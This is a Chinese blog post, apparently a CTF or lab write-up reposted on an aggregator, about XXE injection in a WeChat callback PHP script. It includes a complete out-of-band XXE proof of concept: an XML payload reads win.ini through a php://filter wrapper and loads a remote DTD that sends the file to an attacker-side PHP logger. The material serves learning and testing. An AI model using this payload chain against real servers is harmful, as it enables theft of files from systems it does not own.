WX的XXE实体注入示例

作者: N8_xEnn7nA1 | 来源:发表于2018-11-13 12:11 被阅读0次

WX的XXE实体注入示例
JAVA的XXE漏洞
XXE漏洞知识整理
java xxe漏洞
XXE漏洞学习笔记
2019-08-27
XXE
owasp top 10 谈信息安全
isg ctf write up
XXE攻击原理

查看代码：

image.png

可以看到，要执行的代码也就4行，下面是 webchatCallbackupapiTest 这个类的定义。
既然代码执行了该类的 responseMsg() 函数，那就来看看该函数的实现：

image.png

可以看到，该函数回去读取post请求数据，并将post请求数据通过 simplexml_load_string() 函数转换为XML有关的对象，

其中，也没有禁止xml数据中使用外部实体（例如使用libxml_disable_entity_loader(true)），也没有过滤用户提交的XML数据。
因此可以进行XXE注入。

poc 如下：

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % remote SYSTEM "http://localhost/xxe/1.xml"> 
%remote;
%all;
%send; 
]>

其中，1.xml 如下：

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/xxe/2.php?id=%file;'>"
>
%all;

其中，2.php如下：

<?php file_put_contents("3.txt",$_GET["id"],FILE_APPEND);?>

image.png

提交请求，然后访问：http://120.203.13.75:8123/xxe/3.txt 即可。

网友评论

本文标题：WX的XXE实体注入示例

本文链接：https://www.haomeiwen.com/subject/ywikfqtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

WX的XXE实体注入示例

相关文章

WX的XXE实体注入示例

JAVA的XXE漏洞

XXE漏洞知识整理

java xxe漏洞

XXE漏洞学习笔记

2019-08-27

XXE

owasp top 10 谈信息安全

isg ctf write up

XXE攻击原理

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读